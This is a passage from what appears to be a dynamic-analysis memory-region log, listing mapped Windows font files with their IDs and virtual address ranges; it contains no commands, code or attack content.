end_va = 0x8e0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "garabd.ttf"
filename = "\\Windows\\Fonts\\GARABD.TTF" (normalized: "c:\\windows\\fonts\\garabd.ttf")
Region:
id = 1083
start_va = 0x8b0000
end_va = 0x8defff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "garait.ttf"
filename = "\\Windows\\Fonts\\GARAIT.TTF" (normalized: "c:\\windows\\fonts\\garait.ttf")
Region:
id = 1084
start_va = 0x8b0000
end_va = 0x8defff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "garait.ttf"
filename = "\\Windows\\Fonts\\GARAIT.TTF" (normalized: "c:\\windows\\fonts\\garait.ttf")
Region:
id = 1085
start_va = 0x8b0000
end_va = 0x8d2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gigi.ttf"
filename = "\\Windows\\Fonts\\GIGI.TTF" (normalized: "c:\\windows\\fonts\\gigi.ttf")
Region:
id = 1086
start_va = 0x8b0000
end_va = 0x8d2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gigi.ttf"
filename = "\\Windows\\Fonts\\GIGI.TTF" (normalized: "c:\\windows\\fonts\\gigi.ttf")
Region:
id = 1087
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gil_____.ttf"
filename = "\\Windows\\Fonts\\GIL_____.TTF" (normalized: "c:\\windows\\fonts\\gil_____.ttf")
Region:
id = 1088
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gil_____.ttf"
filename = "\\Windows\\Fonts\\GIL_____.TTF" (normalized: "c:\\windows\\fonts\\gil_____.ttf")
Region:
id = 1089
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gilb____.ttf"
filename = "\\Windows\\Fonts\\GILB____.TTF" (normalized: "c:\\windows\\fonts\\gilb____.ttf")
Region:
id = 1090
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gilb____.ttf"
filename = "\\Windows\\Fonts\\GILB____.TTF" (normalized: "c:\\windows\\fonts\\gilb____.ttf")
Region:
id = 1091
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gilbi___.ttf"
filename = "\\Windows\\Fonts\\GILBI___.TTF" (normalized: "c:\\windows\\fonts\\gilbi___.ttf")
Region:
id = 1092
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gilbi___.ttf"
filename = "\\Windows\\Fonts\\GILBI___.TTF" (normalized: "c:\\windows\\fonts\\gilbi___.ttf")
Region:
id = 1093
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gilc____.ttf"
filename = "\\Windows\\Fonts\\GILC____.TTF" (normalized: "c:\\windows\\fonts\\gilc____.ttf")
Region:
id = 1094
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gilc____.ttf"
filename = "\\Windows\\Fonts\\GILC____.TTF" (normalized: "c:\\windows\\fonts\\gilc____.ttf")
Region:
id = 1095
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gili____.ttf"
filename = "\\Windows\\Fonts\\GILI____.TTF" (normalized: "c:\\windows\\fonts\\gili____.ttf")
Region:
id = 1096
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gili____.ttf"
filename = "\\Windows\\Fonts\\GILI____.TTF" (normalized: "c:\\windows\\fonts\\gili____.ttf")
Region:
id = 1097
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gillubcd.ttf"
filename = "\\Windows\\Fonts\\GILLUBCD.TTF" (normalized: "c:\\windows\\fonts\\gillubcd.ttf")
Region:
id = 1098
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gillubcd.ttf"
filename = "\\Windows\\Fonts\\GILLUBCD.TTF" (normalized: "c:\\windows\\fonts\\gillubcd.ttf")
Region:
id = 1099
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gilsanub.ttf"
filename = "\\Windows\\Fonts\\GILSANUB.TTF" (normalized: "c:\\windows\\fonts\\gilsanub.ttf")
Region:
id = 1100
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gilsanub.ttf"
filename = "\\Windows\\Fonts\\GILSANUB.TTF" (normalized: "c:\\windows\\fonts\\gilsanub.ttf")
Region:
id = 1101
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "glecb.ttf"
filename = "\\Windows\\Fonts\\GLECB.TTF" (normalized: "c:\\windows\\fonts\\glecb.ttf")
Region:
id = 1102
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "glecb.ttf"
filename = "\\Windows\\Fonts\\GLECB.TTF" (normalized: "c:\\windows\\fonts\\glecb.ttf")
Region:
id = 1103
start_va = 0x8b0000
end_va = 0x8c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "glsnecb.ttf"
filename = "\\Windows\\Fonts\\GLSNECB.TTF" (normalized: "c:\\windows\\fonts\\glsnecb.ttf")
Region:
id = 1104
start_va = 0x8b0000
end_va = 0x8c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "glsnecb.ttf"
filename = "\\Windows\\Fonts\\GLSNECB.TTF" (normalized: "c:\\windows\\fonts\\glsnecb.ttf")
Region:
id = 1105
start_va = 0x8b0000
end_va = 0x8d1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gothic.ttf"
filename = "\\Windows\\Fonts\\GOTHIC.TTF" (normalized: "c:\\windows\\fonts\\gothic.ttf")
Region:
id = 1106
start_va = 0x8b0000
end_va = 0x8d1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gothic.ttf"
filename = "\\Windows\\Fonts\\GOTHIC.TTF" (normalized: "c:\\windows\\fonts\\gothic.ttf")
Region:
id = 1107
start_va = 0x8b0000
end_va = 0x8cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gothicb.ttf"
filename = "\\Windows\\Fonts\\GOTHICB.TTF" (normalized: "c:\\windows\\fonts\\gothicb.ttf")
Region:
id = 1108
start_va = 0x8b0000
end_va = 0x8cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gothicb.ttf"
filename = "\\Windows\\Fonts\\GOTHICB.TTF" (normalized: "c:\\windows\\fonts\\gothicb.ttf")
Region:
id = 1109
start_va = 0x8b0000
end_va = 0x8d1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gothicbi.ttf"
filename = "\\Windows\\Fonts\\GOTHICBI.TTF" (normalized: "c:\\windows\\fonts\\gothicbi.ttf")
Region:
id = 1110
start_va = 0x8b0000
end_va = 0x8d1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gothicbi.ttf"
filename = "\\Windows\\Fonts\\GOTHICBI.TTF" (normalized: "c:\\windows\\fonts\\gothicbi.ttf")
Region:
id = 1111
start_va = 0x8b0000
end_va = 0x8d4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gothici.ttf"
filename = "\\Windows\\Fonts\\GOTHICI.TTF" (normalized: "c:\\windows\\fonts\\gothici.ttf")
Region:
id = 1112
start_va = 0x8b0000
end_va = 0x8d4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gothici.ttf"
filename = "\\Windows\\Fonts\\GOTHICI.TTF" (normalized: "c:\\windows\\fonts\\gothici.ttf")
Region:
id = 1113
start_va = 0x8b0000
end_va = 0x8c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "goudos.ttf"
filename = "\\Windows\\Fonts\\GOUDOS.TTF" (normalized: "c:\\windows\\fonts\\goudos.ttf")
Region:
id = 1114
start_va = 0x8b0000
end_va = 0x8c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "goudos.ttf"
filename = "\\Windows\\Fonts\\GOUDOS.TTF" (normalized: "c:\\windows\\fonts\\goudos.ttf")
Region:
id = 1115
start_va = 0x8b0000
end_va = 0x8c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "goudosb.ttf"
filename = "\\Windows\\Fonts\\GOUDOSB.TTF" (normalized: "c:\\windows\\fonts\\goudosb.ttf")
Region:
id = 1116
start_va = 0x8b0000
end_va = 0x8c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "goudosb.ttf"
filename = "\\Windows\\Fonts\\GOUDOSB.TTF" (normalized: "c:\\windows\\fonts\\goudosb.ttf")
Region:
id = 1117
start_va = 0x8b0000
end_va = 0x8c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "goudosi.ttf"
filename = "\\Windows\\Fonts\\GOUDOSI.TTF" (normalized: "c:\\windows\\fonts\\goudosi.ttf")
Region:
id = 1118
start_va = 0x8b0000
end_va = 0x8c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "goudosi.ttf"
filename = "\\Windows\\Fonts\\GOUDOSI.TTF" (normalized: "c:\\windows\\fonts\\goudosi.ttf")
Region:
id = 1119
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "goudysto.ttf"
filename = "\\Windows\\Fonts\\GOUDYSTO.TTF" (normalized: "c:\\windows\\fonts\\goudysto.ttf")
Region:
id = 1120
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "goudysto.ttf"
filename = "\\Windows\\Fonts\\GOUDYSTO.TTF" (normalized: "c:\\windows\\fonts\\goudysto.ttf")
Region:
id = 1121
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "harlowsi.ttf"
filename = "\\Windows\\Fonts\\HARLOWSI.TTF" (normalized: "c:\\windows\\fonts\\harlowsi.ttf")
Region:
id = 1122
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "harlowsi.ttf"
filename = "\\Windows\\Fonts\\HARLOWSI.TTF" (normalized: "c:\\windows\\fonts\\harlowsi.ttf")
Region:
id = 1123
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "harngton.ttf"
filename = "\\Windows\\Fonts\\HARNGTON.TTF" (normalized: "c:\\windows\\fonts\\harngton.ttf")
Region:
id = 1124
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "harngton.ttf"
filename = "\\Windows\\Fonts\\HARNGTON.TTF" (normalized: "c:\\windows\\fonts\\harngton.ttf")
Region:
id = 1125
start_va = 0x8b0000
end_va = 0x8cafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "hatten.ttf"
filename = "\\Windows\\Fonts\\HATTEN.TTF" (normalized: "c:\\windows\\fonts\\hatten.ttf")
Region:
id = 1126
start_va = 0x8b0000
end_va = 0x8cafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "hatten.ttf"
filename = "\\Windows\\Fonts\\HATTEN.TTF" (normalized: "c:\\windows\\fonts\\hatten.ttf")
Region:
id = 1127
start_va = 0x8b0000
end_va = 0x8c6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "htowert.ttf"
filename = "\\Windows\\Fonts\\HTOWERT.TTF" (normalized: "c:\\windows\\fonts\\htowert.ttf")
Region:
id = 1128
start_va = 0x8b0000
end_va = 0x8c6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "htowert.ttf"
filename = "\\Windows\\Fonts\\HTOWERT.TTF" (normalized: "c:\\windows\\fonts\\htowert.ttf")
Region:
id = 1129
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "htowerti.ttf"
filename = "\\Windows\\Fonts\\HTOWERTI.TTF" (normalized: "c:\\windows\\fonts\\htowerti.ttf")
Region:
id = 1130
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "htowerti.ttf"
filename = "\\Windows\\Fonts\\HTOWERTI.TTF" (normalized: "c:\\windows\\fonts\\htowerti.ttf")
Region:
id = 1131
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "imprisha.ttf"
filename = "\\Windows\\Fonts\\IMPRISHA.TTF" (normalized: "c:\\windows\\fonts\\imprisha.ttf")
Region:
id = 1132
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "imprisha.ttf"
filename = "\\Windows\\Fonts\\IMPRISHA.TTF" (normalized: "c:\\windows\\fonts\\imprisha.ttf")
Region:
id = 1133
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "infroman.ttf"
filename = "\\Windows\\Fonts\\INFROMAN.TTF" (normalized: "c:\\windows\\fonts\\infroman.ttf")
Region:
id = 1134
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "infroman.ttf"
filename = "\\Windows\\Fonts\\INFROMAN.TTF" (normalized: "c:\\windows\\fonts\\infroman.ttf")
Region:
id = 1135
start_va = 0x8b0000
end_va = 0x8d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "itcblkad.ttf"
filename = "\\Windows\\Fonts\\ITCBLKAD.TTF" (normalized: "c:\\windows\\fonts\\itcblkad.ttf")
Region:
id = 1136
start_va = 0x8b0000
end_va = 0x8d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "itcblkad.ttf"
filename = "\\Windows\\Fonts\\ITCBLKAD.TTF" (normalized: "c:\\windows\\fonts\\itcblkad.ttf")
Region:
id = 1137
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "itcedscr.ttf"
filename = "\\Windows\\Fonts\\ITCEDSCR.TTF" (normalized: "c:\\windows\\fonts\\itcedscr.ttf")
Region:
id = 1138
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "itcedscr.ttf"
filename = "\\Windows\\Fonts\\ITCEDSCR.TTF" (normalized: "c:\\windows\\fonts\\itcedscr.ttf")
Region:
id = 1139
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "itckrist.ttf"
filename = "\\Windows\\Fonts\\ITCKRIST.TTF" (normalized: "c:\\windows\\fonts\\itckrist.ttf")
Region:
id = 1140
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "itckrist.ttf"
filename = "\\Windows\\Fonts\\ITCKRIST.TTF" (normalized: "c:\\windows\\fonts\\itckrist.ttf")
Region:
id = 1141
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "jokerman.ttf"
filename = "\\Windows\\Fonts\\JOKERMAN.TTF" (normalized: "c:\\windows\\fonts\\jokerman.ttf")
Region:
id = 1142
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "jokerman.ttf"
filename = "\\Windows\\Fonts\\JOKERMAN.TTF" (normalized: "c:\\windows\\fonts\\jokerman.ttf")
Region:
id = 1143
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "juice___.ttf"
filename = "\\Windows\\Fonts\\JUICE___.TTF" (normalized: "c:\\windows\\fonts\\juice___.ttf")
Region:
id = 1144
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "juice___.ttf"
filename = "\\Windows\\Fonts\\JUICE___.TTF" (normalized: "c:\\windows\\fonts\\juice___.ttf")
Region:
id = 1145
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kunstler.ttf"
filename = "\\Windows\\Fonts\\KUNSTLER.TTF" (normalized: "c:\\windows\\fonts\\kunstler.ttf")
Region:
id = 1146
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kunstler.ttf"
filename = "\\Windows\\Fonts\\KUNSTLER.TTF" (normalized: "c:\\windows\\fonts\\kunstler.ttf")
Region:
id = 1147
start_va = 0x610000
end_va = 0x61afff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "latinwd.ttf"
filename = "\\Windows\\Fonts\\LATINWD.TTF" (normalized: "c:\\windows\\fonts\\latinwd.ttf")
Region:
id = 1148
start_va = 0x610000
end_va = 0x61afff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "latinwd.ttf"
filename = "\\Windows\\Fonts\\LATINWD.TTF" (normalized: "c:\\windows\\fonts\\latinwd.ttf")
Region:
id = 1149
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lbrite.ttf"
filename = "\\Windows\\Fonts\\LBRITE.TTF" (normalized: "c:\\windows\\fonts\\lbrite.ttf")
Region:
id = 1150
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lbrite.ttf"
filename = "\\Windows\\Fonts\\LBRITE.TTF" (normalized: "c:\\windows\\fonts\\lbrite.ttf")
Region:
id = 1151
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lbrited.ttf"
filename = "\\Windows\\Fonts\\LBRITED.TTF" (normalized: "c:\\windows\\fonts\\lbrited.ttf")
Region:
id = 1152
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lbrited.ttf"
filename = "\\Windows\\Fonts\\LBRITED.TTF" (normalized: "c:\\windows\\fonts\\lbrited.ttf")
Region:
id = 1153
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lbritedi.ttf"
filename = "\\Windows\\Fonts\\LBRITEDI.TTF" (normalized: "c:\\windows\\fonts\\lbritedi.ttf")
Region:
id = 1154
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lbritedi.ttf"
filename = "\\Windows\\Fonts\\LBRITEDI.TTF" (normalized: "c:\\windows\\fonts\\lbritedi.ttf")
Region:
id = 1155
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lbritei.ttf"
filename = "\\Windows\\Fonts\\LBRITEI.TTF" (normalized: "c:\\windows\\fonts\\lbritei.ttf")
Region:
id = 1156
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lbritei.ttf"
filename = "\\Windows\\Fonts\\LBRITEI.TTF" (normalized: "c:\\windows\\fonts\\lbritei.ttf")
Region:
id = 1157
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lcallig.ttf"
filename = "\\Windows\\Fonts\\LCALLIG.TTF" (normalized: "c:\\windows\\fonts\\lcallig.ttf")
Region:
id = 1158
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lcallig.ttf"
filename = "\\Windows\\Fonts\\LCALLIG.TTF" (normalized: "c:\\windows\\fonts\\lcallig.ttf")
Region:
id = 1159
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lfax.ttf"
filename = "\\Windows\\Fonts\\LFAX.TTF" (normalized: "c:\\windows\\fonts\\lfax.ttf")
Region:
id = 1160
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lfax.ttf"
filename = "\\Windows\\Fonts\\LFAX.TTF" (normalized: "c:\\windows\\fonts\\lfax.ttf")
Region:
id = 1161
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lfaxd.ttf"
filename = "\\Windows\\Fonts\\LFAXD.TTF" (normalized: "c:\\windows\\fonts\\lfaxd.ttf")
Region:
id = 1162
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lfaxd.ttf"
filename = "\\Windows\\Fonts\\LFAXD.TTF" (normalized: "c:\\windows\\fonts\\lfaxd.ttf")
Region:
id = 1163
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lfaxdi.ttf"
filename = "\\Windows\\Fonts\\LFAXDI.TTF" (normalized: "c:\\windows\\fonts\\lfaxdi.ttf")
Region:
id = 1164
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lfaxdi.ttf"
filename = "\\Windows\\Fonts\\LFAXDI.TTF" (normalized: "c:\\windows\\fonts\\lfaxdi.ttf")
Region:
id = 1165
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lfaxi.ttf"
filename = "\\Windows\\Fonts\\LFAXI.TTF" (normalized: "c:\\windows\\fonts\\lfaxi.ttf")
Region:
id = 1166
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lfaxi.ttf"
filename = "\\Windows\\Fonts\\LFAXI.TTF" (normalized: "c:\\windows\\fonts\\lfaxi.ttf")
Region:
id = 1167
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lhandw.ttf"
filename = "\\Windows\\Fonts\\LHANDW.TTF" (normalized: "c:\\windows\\fonts\\lhandw.ttf")
Region:
id = 1168
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lhandw.ttf"
filename = "\\Windows\\Fonts\\LHANDW.TTF" (normalized: "c:\\windows\\fonts\\lhandw.ttf")
Region:
id = 1169
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lsans.ttf"
filename = "\\Windows\\Fonts\\LSANS.TTF" (normalized: "c:\\windows\\fonts\\lsans.ttf")
Region:
id = 1170
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lsans.ttf"
filename = "\\Windows\\Fonts\\LSANS.TTF" (normalized: "c:\\windows\\fonts\\lsans.ttf")
Region:
id = 1171
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lsansd.ttf"
filename = "\\Windows\\Fonts\\LSANSD.TTF" (normalized: "c:\\windows\\fonts\\lsansd.ttf")
Region:
id = 1172
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lsansd.ttf"
filename = "\\Windows\\Fonts\\LSANSD.TTF" (normalized: "c:\\windows\\fonts\\lsansd.ttf")
Region:
id = 1173
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lsansdi.ttf"
filename = "\\Windows\\Fonts\\LSANSDI.TTF" (normalized: "c:\\windows\\fonts\\lsansdi.ttf")
Region:
id = 1174
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lsansdi.ttf"
filename = "\\Windows\\Fonts\\LSANSDI.TTF" (normalized: "c:\\windows\\fonts\\lsansdi.ttf")
Region:
id = 1175
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lsansi.ttf"
filename = "\\Windows\\Fonts\\LSANSI.TTF" (normalized: "c:\\windows\\fonts\\lsansi.ttf")
Region:
id = 1176
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lsansi.ttf"
filename = "\\Windows\\Fonts\\LSANSI.TTF" (normalized: "c:\\windows\\fonts\\lsansi.ttf")
Region:
id = 1177
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ltype.ttf"
filename = "\\Windows\\Fonts\\LTYPE.TTF" (normalized: "c:\\windows\\fonts\\ltype.ttf")
Region:
id = 1178
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ltype.ttf"
filename = "\\Windows\\Fonts\\LTYPE.TTF" (normalized: "c:\\windows\\fonts\\ltype.ttf")
Region:
id = 1179
start_va = 0x610000
end_va = 0x61cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ltypeb.ttf"
filename = "\\Windows\\Fonts\\LTYPEB.TTF" (normalized: "c:\\windows\\fonts\\ltypeb.ttf")
Region:
id = 1180
start_va = 0x610000
end_va = 0x61cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ltypeb.ttf"
filename = "\\Windows\\Fonts\\LTYPEB.TTF" (normalized: "c:\\windows\\fonts\\ltypeb.ttf")
Region:
id = 1181
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ltypebo.ttf"
filename = "\\Windows\\Fonts\\LTYPEBO.TTF" (normalized: "c:\\windows\\fonts\\ltypebo.ttf")
Region:
id = 1182
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ltypebo.ttf"
filename = "\\Windows\\Fonts\\LTYPEBO.TTF" (normalized: "c:\\windows\\fonts\\ltypebo.ttf")
Region:
id = 1183
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ltypeo.ttf"
filename = "\\Windows\\Fonts\\LTYPEO.TTF" (normalized: "c:\\windows\\fonts\\ltypeo.ttf")
Region:
id = 1184
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ltypeo.ttf"
filename = "\\Windows\\Fonts\\LTYPEO.TTF" (normalized: "c:\\windows\\fonts\\ltypeo.ttf")
Region:
id = 1185
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "magnetob.ttf"
filename = "\\Windows\\Fonts\\MAGNETOB.TTF" (normalized: "c:\\windows\\fonts\\magnetob.ttf")
Region:
id = 1186
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "magnetob.ttf"
filename = "\\Windows\\Fonts\\MAGNETOB.TTF" (normalized: "c:\\windows\\fonts\\magnetob.ttf")
Region:
id = 1187
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "maian.ttf"
filename = "\\Windows\\Fonts\\MAIAN.TTF" (normalized: "c:\\windows\\fonts\\maian.ttf")
Region:
id = 1188
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "maian.ttf"
filename = "\\Windows\\Fonts\\MAIAN.TTF" (normalized: "c:\\windows\\fonts\\maian.ttf")
Region:
id = 1189
start_va = 0x610000
end_va = 0x61cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "maturasc.ttf"
filename = "\\Windows\\Fonts\\MATURASC.TTF" (normalized: "c:\\windows\\fonts\\maturasc.ttf")
Region:
id = 1190
start_va = 0x610000
end_va = 0x61cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "maturasc.ttf"
filename = "\\Windows\\Fonts\\MATURASC.TTF" (normalized: "c:\\windows\\fonts\\maturasc.ttf")
Region:
id = 1191
start_va = 0x8b0000
end_va = 0x8defff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mistral.ttf"
filename = "\\Windows\\Fonts\\MISTRAL.TTF" (normalized: "c:\\windows\\fonts\\mistral.ttf")
Region:
id = 1192
start_va = 0x8b0000
end_va = 0x8defff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mistral.ttf"
filename = "\\Windows\\Fonts\\MISTRAL.TTF" (normalized: "c:\\windows\\fonts\\mistral.ttf")
Region:
id = 1193
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mod20.ttf"
filename = "\\Windows\\Fonts\\MOD20.TTF" (normalized: "c:\\windows\\fonts\\mod20.ttf")
Region:
id = 1194
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mod20.ttf"
filename = "\\Windows\\Fonts\\MOD20.TTF" (normalized: "c:\\windows\\fonts\\mod20.ttf")
Region:
id = 1195
start_va = 0x7d50000
end_va = 0x91a0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msjh.ttc"
filename = "\\Windows\\Fonts\\MSJH.TTC" (normalized: "c:\\windows\\fonts\\msjh.ttc")
Region:
id = 1196
start_va = 0x7d50000
end_va = 0x91a0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msjh.ttc"
filename = "\\Windows\\Fonts\\MSJH.TTC" (normalized: "c:\\windows\\fonts\\msjh.ttc")
Region:
id = 1197
start_va = 0x7d50000
end_va = 0x91a0fff
monitored = 0
entry_point = 0x0
